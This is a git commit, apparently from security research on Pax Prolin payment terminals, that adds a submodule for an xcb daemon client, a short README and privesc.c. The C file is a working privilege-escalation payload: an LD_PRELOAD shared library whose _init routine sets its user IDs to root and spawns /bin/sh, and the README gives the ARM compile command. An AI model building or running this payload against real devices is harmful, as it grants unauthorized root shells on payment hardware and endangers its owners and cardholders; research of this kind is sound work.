Added privesc code and xcb-client

2020-06-01 10:15:17 +02:00 · 2020-06-01 10:15:17 +02:00 · 499c1e91e8
commit 499c1e91e8
parent 4ae897ecec
4 changed files with 30 additions and 0 deletions
--- a/.gitmodules
+++ b/.gitmodules
@ -0,0 +1,3 @@
+[submodule "code/prolin-xcb-client"]
+	path = code/prolin-xcb-client
+	url = https://git.lsd.cat/g/prolin-xcb-client
--- a/code/Readme.md
+++ b/code/Readme.md
@ -0,0 +1,12 @@
+## prolin-xcb-tools
+Python-ADB fork in order to communicate with the Pax `xcbd` daemon. Supports natively directory listing, reading and writing. Port forwarding may be done trough the original `xcb` client.
+
+## privesc.c
+The shared library used for privilege escalation.
+
+Compile with:
+
+```
+arm-none-eabi-gcc -shared -fPIC -o privesc.so privesc.c -nostartfiles -static
+```
+
--- a/code/privesc.c
+++ b/code/privesc.c
@ -0,0 +1,14 @@
+#include <stdio.h>
+#include <sys/types.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+int _init() {
+        unsetenv("LD_PRELOAD");
+        puts("LD_PRELOAD is working!");
+        setreuid(0, 0);
+        setuid(0);
+        printf("UID: %d. EUID: %d.\n", getuid(), geteuid());
+        system("/bin/sh");
+        exit(0);
+}
--- a/code/prolin-xcb-client
+++ b/code/prolin-xcb-client
@ -0,0 +1 @@
+Subproject commit 8d00509ab221200388da9be68f406c7982f9cf60
				`@ -0,0 +1 @@`
				`Subproject commit 8d00509ab221200388da9be68f406c7982f9cf60`